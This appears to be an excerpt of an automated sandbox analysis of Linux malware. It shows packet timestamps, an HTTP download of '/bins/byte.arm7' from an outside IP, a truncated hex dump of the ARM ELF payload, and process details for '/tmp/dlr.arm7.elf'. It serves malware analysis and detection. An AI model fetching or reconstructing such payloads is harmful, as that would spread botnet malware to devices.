        Nov 1, 2024 15:06:16.549730062 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.550486088 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.553464890 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.553584099 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.554274082 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.555289030 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.555352926 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.556171894 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.776880980 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.818773985 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.965698004 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.970963955 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.971023083 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.971041918 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.971055984 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.971066952 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.971079111 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.971091986 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.971301079 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.971415043 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.971519947 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.971533060 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.971544027 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.971555948 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.971566916 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.971579075 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.973790884 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:16.976433039 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.976443052 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:16.976619959 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:17.030719042 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:17.035744905 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.035767078 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.035778046 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.036187887 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.036259890 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.038203001 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:17.256845951 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.256951094 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:17.490573883 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:17.495660067 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.495693922 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.495706081 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.495764971 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:17.496155024 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.496166945 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.496177912 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.497052908 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.497098923 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.497111082 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.497441053 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:17.498058081 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.498070002 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.498081923 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.498969078 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.499052048 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.499855042 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:17.502286911 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.502300024 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.502310038 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.502448082 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:17.722114086 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.766721010 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:17.878964901 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:17.884170055 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.884183884 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.884195089 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.884561062 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.884609938 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.884622097 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.885560989 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.885571957 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.885582924 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.886370897 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:17.886496067 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.886526108 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.886538029 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.887414932 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.887442112 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.887453079 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.888780117 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:17.891427040 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.891438961 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:17.893207073 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:18.112993002 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:18.154714108 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:18.261677027 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:18.266686916 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:18.266710997 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:18.267179966 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:18.267191887 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:18.268069029 CET8039058154.216.16.39192.168.2.14
        Nov 1, 2024 15:06:18.269150972 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:19.631592035 CET3905880192.168.2.14154.216.16.39
        Nov 1, 2024 15:06:19.636586905 CET8039058154.216.16.39192.168.2.14
        Session IDSource IPSource PortDestination IPDestination Port
        0192.168.2.1439058154.216.16.3980
        TimestampBytes transferredDirectionData
        Nov 1, 2024 15:06:15.187587023 CET46OUTGET /bins/byte.arm7 HTTP/1.0
        Data Raw: 00 00
        Data Ascii:
        Nov 1, 2024 15:06:16.088857889 CET1236INHTTP/1.1 200 OK
        Date: Fri, 01 Nov 2024 14:06:15 GMT
        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
        Last-Modified: Thu, 31 Oct 2024 11:24:54 GMT
        ETag: "278bd-625c4114a1ca3"
        Accept-Ranges: bytes
        Content-Length: 161981
        Connection: close
        Data Raw: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 28 00 01 00 00 00 94 81 00 00 34 00 00 00 ec f6 01 00 02 00 00 04 34 00 20 00 05 00 28 00 1d 00 1a 00 01 00 00 70 90 80 01 00 90 00 02 00 90 00 02 00 18 01 00 00 18 01 00 00 04 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 00 80 00 00 00 80 00 00 a8 81 01 00 a8 81 01 00 05 00 00 00 00 80 00 00 01 00 00 00 a8 81 01 00 a8 81 02 00 a8 81 02 00 6c 0b 00 00 e0 3b 00 00 06 00 00 00 00 80 00 00 07 00 00 00 ac 81 01 00 ac 81 02 00 ac 81 02 00 00 00 00 00 08 00 00 00 04 00 00 00 04 00 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 00 00 00 0d c0 a0 e1 f0 df 2d e9 04 b0 4c e2 f0 af 1b e9 00 00 00 00 00 00 00 00 00 00 00 00 10 40 2d e9 2c 40 9f e5 00 30 d4 e5 00 00 53 e3 06 00 00 1a 20 30 9f e5 00 00 53 e3 1c 00 9f 15 0f e0 a0 11 13 ff 2f 11 01 30 a0 e3 00 30 c4 e5 10 40 bd e8 1e ff 2f e1 14 8d 02 00 00 00 00 00 a8 81 02 00 04 e0 2d e5 40 30 9f e5 00 00 53 e3 04 d0 4d e2 38 00 9f 15 38 10 9f 15 0f e0 a0 11 13 ff [TRUNCATED]
        Data Ascii: ELF(44 (pl;Qtd-L@-,@0S 0S/00@/-@0SM88/00S$0S// ---093LP@-@0S0SP@/@G-`p 6p00PPPUG/6p@P7 l4j4l0Q`0 0S0SPU4 $0/04O-QM@PO/!< 4,4T T Y1p0DS:`0pg0G P`FV0
        Nov 1, 2024 15:06:16.088998079 CET1236INData Raw: a0 e3 00 40 a0 e1 14 20 cc e5 04 10 8c e5 b0 30 cc e1 05 00 80 e2 18 c0 8c e2 f1 ff ff 1a 00 00 56 e3 3e 00 00 0a 00 50 d4 e5 00 00 55 e3 07 80 47 e2 05 60 a0 01 30 00 00 0a 05 00 a0 e1 08 10 a0 e3 c6 30 00 eb 00 00 58 e3 00 60 a0 e1 33 00 00 0a
        Data Ascii: @ 0V>PUG`00X`30W00.@GX p $ X"0 R00Bp@X000 0 1
        Nov 1, 2024 15:06:16.089010954 CET260INData Raw: a0 e1 06 30 a0 e3 08 10 81 e0 00 00 96 e5 00 20 85 e5 04 30 c5 e5 01 11 a0 e1 ee 2f 00 eb 00 30 d4 e5 00 20 a0 e1 03 51 80 e7 07 10 a0 e1 08 30 83 e0 08 00 a0 e1 00 30 c4 e5 00 20 86 e5 95 2f 00 eb 00 10 d4 e5 b4 20 9f e5 00 50 a0 e1 07 30 a0 e3
        Data Ascii: 0 0/0 Q00 / P0 0/0 Q00 /l P0 0/0Q A/04
        Nov 1, 2024 15:06:16.089021921 CET1236INData Raw: 00 00 7c ab 00 00 6c 9a 00 00 d8 93 00 00 4c 8c 00 00 f0 4f 2d e9 2c d0 4d e2 04 10 8d e5 04 10 a0 e3 02 50 a0 e1 03 60 a0 e1 00 70 a0 e1 5b 2f 00 eb 04 10 a0 e3 00 a0 a0 e1 07 00 a0 e1 57 2f 00 eb 01 48 a0 e3 01 40 44 e2 06 10 a0 e1 07 20 a0 e3
        Data Ascii: |lLO-,MP`p[/W/H@D 0, 0 < 0,X)h0V $000 0)<$ =
        Nov 1, 2024 15:06:16.089032888 CET1236INData Raw: 83 e1 04 30 86 e5 ce ff ff ea 2c d0 8d e2 f0 4f bd e8 1e ff 2f e1 10 c0 9d e5 00 00 5c e3 0b 00 00 1a 10 40 9d e5 03 00 00 ea 04 01 98 e7 04 11 9a e7 e3 2a 00 eb 01 40 84 e2 04 00 57 e1 05 20 a0 e1 01 39 a0 e3 f7 ff ff ca 00 40 a0 e3 f9 ff ff ea
        Data Ascii: 0,O/\@*@W 9@`VA 9*`O-TM@Pp. 080C @
        Nov 1, 2024 15:06:16.089047909 CET1236INData Raw: 82 e1 30 2c 82 e0 ff 08 02 e2 22 3c a0 e1 20 34 83 e1 ff 1c 02 e2 01 34 83 e1 02 3c 83 e1 10 30 85 e5 18 30 9d e5 01 00 73 e3 b3 ff ff 1a 09 11 00 eb 01 48 a0 e3 20 c0 9d e5 01 40 44 e2 04 00 5c e1 0c 00 85 e5 b1 ff ff 1a 02 11 00 eb b4 00 c5 e1
        Data Ascii: 0,"< 44<00sH @D\,P0Q40SDV4TO/hO-tM@P,$ 0g8
        Nov 1, 2024 15:06:16.089059114 CET1236INData Raw: 00 9a 28 10 9d e5 01 00 71 e3 6a 00 00 0a 01 48 a0 e3 01 40 44 e2 04 00 5b e1 6c 00 00 0a 3c 20 9d e5 04 00 52 e1 73 00 00 0a 40 30 9d e5 04 00 53 e1 75 00 00 0a 4c 40 9d e5 00 00 54 e3 10 30 95 15 10 30 86 15 77 00 00 0a d0 0f 00 eb 68 00 8d e5
        Data Ascii: (qjH@D[l< Rs@0SuL@T00whdh` d ` b HQa 00@ 0@
        Nov 1, 2024 15:06:16.089071035 CET908INData Raw: a0 e1 54 00 8d e5 4c e0 8d e5 08 30 8d e5 48 40 8d e5 27 7c 85 e1 00 40 a0 e3 5e 0e a0 e3 04 10 a0 e3 06 00 80 e2 95 2a 00 eb 1c 20 9d e5 5c 30 9d e5 04 01 82 e7 03 41 92 e7 00 20 d4 e5 b0 20 c2 e3 40 20 82 e3 00 20 c4 e5 83 12 a0 e1 83 11 41 e0
        Data Ascii: TL0H@'|@^* \0A @ A0000P0( ,0U0@0TP0/00 0P0 0 0 @ 0000(P P0,
        Nov 1, 2024 15:06:16.089099884 CET1236INData Raw: 9d e5 00 00 51 e3 10 00 86 e5 9b ff ff 0a 08 00 87 e2 3c 10 9d e5 30 0e 00 eb 97 ff ff ea 24 00 9d e5 db 30 00 eb 64 d0 8d e2 f0 4f bd e8 1e ff 2f e1 3c 10 9d e5 3c 20 9d e5 08 10 81 e2 34 80 82 e2 0c 10 8d e5 68 ff ff ea 68 b8 02 00 f0 4f 2d e9
        Data Ascii: Q<0$0dO/<< 4hhO-4M@P) 0;80C 2 @0p, 0$80C
        Nov 1, 2024 15:06:16.089123011 CET1236INData Raw: a0 e1 ff c0 0c e2 01 30 43 e2 03 20 a0 e3 04 00 a0 e1 05 10 a0 e1 34 c0 8d e5 23 f8 ff eb 05 10 a0 e1 20 00 8d e5 04 20 a0 e3 04 00 a0 e1 40 30 a0 e3 1d f8 ff eb 00 c0 a0 e1 ff c0 0c e2 05 10 a0 e1 05 20 a0 e3 00 30 a0 e3 04 00 a0 e1 3c c0 8d e5
        Data Ascii: 0C 4# @0 0<80C @$ 508(0C , 0 0p
        Nov 1, 2024 15:06:16.093950987 CET1236INData Raw: 87 e2 1c 30 9d e5 01 58 a0 e3 38 c0 9d e5 00 41 93 e7 01 50 45 e2 05 00 5c e1 14 60 84 e2 33 00 00 0a 44 e0 9d e5 05 00 5e e1 35 00 00 0a 48 00 9d e5 05 00 50 e1 37 00 00 0a 4c 20 9d e5 05 00 52 e1 39 00 00 0a 29 00 84 e2 50 10 9d e5 8a 0b 00 eb
        Data Ascii: 0X8APE\`3D^5HP7L R9)P00 08L``90 @@$8X0X80


        System Behavior

        Start time (UTC):14:06:14
        Start date (UTC):01/11/2024
        Path:/tmp/dlr.arm7.elf
        Arguments:/tmp/dlr.arm7.elf
        File size:4956856 bytes
        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1